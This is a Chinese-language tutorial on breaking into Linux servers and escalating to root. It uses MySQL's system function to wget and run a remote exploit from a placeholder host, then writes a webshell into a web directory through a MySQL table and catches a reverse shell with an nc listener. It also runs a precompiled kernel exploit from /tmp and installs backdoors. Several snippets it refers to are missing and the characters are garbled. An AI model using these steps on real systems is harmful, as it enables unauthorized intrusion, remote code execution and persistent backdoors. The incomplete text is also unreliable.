linux入侵提權(quán)(服務(wù)器提權(quán))方法

linux入侵提權(quán)(服務(wù)器提權(quán))方法

　　你還在為不知道linux入侵提權(quán)(服務(wù)器提權(quán))方法而煩惱么?接下來(lái)是小編為大家收集的linux入侵提權(quán)(服務(wù)器提權(quán))方法教程，希望能幫到大家。

　　linux入侵提權(quán)(服務(wù)器提權(quán))方法：

　　mysql 5.x里面引入了一個(gè)system函數(shù)，這個(gè)函數(shù)可以執(zhí)行系統(tǒng)命令，當(dāng)mysql以root登陸的時(shí)候，就可以利用這個(gè)函數(shù)執(zhí)行命令，當(dāng)然是在權(quán)限許可的 范圍內(nèi)。

　　一般我們按照常規(guī)思路，搞到mysql的root密碼之后，我們都會(huì)連接上去，創(chuàng)建一個(gè)表，然后outfile，搞到一個(gè)webshell ,然后提權(quán)如斯這般。今天我們換一種方式。

　　按照上面的方法，我們需要知道web的絕對(duì)路徑，當(dāng)然這個(gè)很不好找，有些有sqlinjection的，可能報(bào)錯(cuò)會(huì)顯示出來(lái)，有的就不一定了。但是 按照我的的方法，沒(méi)有必要再去找web路徑了，直接執(zhí)行

　　mysql>system vi /etc/httpd/conf/httpd.conf;

　　直接這樣就可以找到web的路徑，當(dāng)然，我們的目的并不是找web路徑，放webshell進(jìn)去。我們是要來(lái)做其他的事情，好比，下載exp執(zhí)行， 搞到 root權(quán)限，然后裝后門(mén)

　　mysql>system wget http://www.xxx.com/xxxx ;

　　mysql>system chmod +x xxxx; mysql>system ./xxxx;

　　這樣mysql的root此時(shí)就成為system的root了，剩下的事情，假如開(kāi)了ssh,就ssh連接上去，輸入mysql的用戶密碼，ok,搞 定。

　　Linux低權(quán)限提權(quán)

　　反彈試試 tmp里創(chuàng)建好文件，SHELL目錄傳馬，執(zhí)行，本地NC監(jiān)聽(tīng)上線，WHOAMI一下，是WWWROOT權(quán)限

　　查看版本

　　可以CD到根目錄上級(jí)(/var/www/virtual/)，再LS一下，全盤(pán)網(wǎng)站都出來(lái)了，目標(biāo)站也沒(méi)瞎起文件夾名，但是沒(méi)權(quán)限跳不進(jìn)去

　　試著TAR打包，沒(méi)權(quán)限，試著單獨(dú)打包目標(biāo)站目錄文件，可以，但是根目錄CONN.CONFIG被限制當(dāng)前目標(biāo)站可讀權(quán)限。

　　嘗試CP目標(biāo)站include目錄，竟然可以復(fù)制過(guò)來(lái)，但是不可寫(xiě)復(fù)制不過(guò)去，找到了數(shù)據(jù)庫(kù)配置信息，再另外服務(wù)器上。

　　先把數(shù)據(jù)庫(kù)用phpspyshell備份過(guò)來(lái):

　　查看到一些配置信息跟賬號(hào)，但是沒(méi)有后臺(tái)路徑等敏感信息

　　掃描工具掃不到目標(biāo)網(wǎng)站文件夾，估計(jì)修改過(guò)了

　　試著提權(quán)CMDSHELL為USER或者ROOT,沒(méi)有直接去看Apache的配置設(shè)置，試著WGET幾個(gè)EXP,但是都沒(méi)用，估計(jì)打過(guò)補(bǔ)丁

　　CP雖然可以，但是不知道具體的信息

　　既然WEB沒(méi)權(quán)限，就試著MYSQL看看有沒(méi)有權(quán)限吧

　　直接

　　CREATE TABLE hackdn (spider BLOB);創(chuàng)建表hackdn

　　插一句話

　　保存

　　然后備份成目標(biāo)路徑1.php文件。發(fā)現(xiàn)連接不了。

　　CP過(guò)來(lái)一看，被反譯符分隔了，

　　不加 ‘ 的話，就插入

　　再備份為PHP后，本地保存以下代碼為

　　簡(jiǎn)單的linux提權(quán)

　　拿到shell了,準(zhǔn)備提權(quán).先看下linux內(nèi)核

　　uname -a

　　2.6.18-194.11.3.el5 內(nèi)核 2010的,這個(gè)好CentOS release 5.5好提

　　然后百度或者其它路徑找EXP,2.6.18-194這個(gè)內(nèi)核我已經(jīng)收藏過(guò).上傳到/tmp,為什么要傳到這個(gè)目錄呢?

　　因?yàn)閠mp目錄可寫(xiě)可執(zhí)行一般,繼續(xù)ing.

　　找個(gè)外網(wǎng)IP 監(jiān)聽(tīng)12666,當(dāng)然12666也可以改。我這里用NC監(jiān)聽(tīng)nc -l -n -v -p 12666

　　然后再點(diǎn)你shell

　　連接成功就出現(xiàn)下面的內(nèi)容

　　然后我們進(jìn)到/tmp目錄

　　cd /tmp 進(jìn)入到tmp目錄了,看下我們之前上傳的2.6.18-194

　　我這里有權(quán)限r(nóng)wx，可讀可寫(xiě)可執(zhí)行.如果沒(méi)有權(quán)限chmod -R 777 文件名

　　我這里的exp已編譯過(guò)了,直接執(zhí)行溢出就ok了 ./2.6.18-194 要是你的exp沒(méi)有編譯gcc -o /tmp/文件名 /tmp/文件名.c ,自己編譯下就行了

　　成功了。。 其實(shí)linux提權(quán)還是很簡(jiǎn)單,關(guān)鍵看有沒(méi)exp... 完了 完了 !!!!!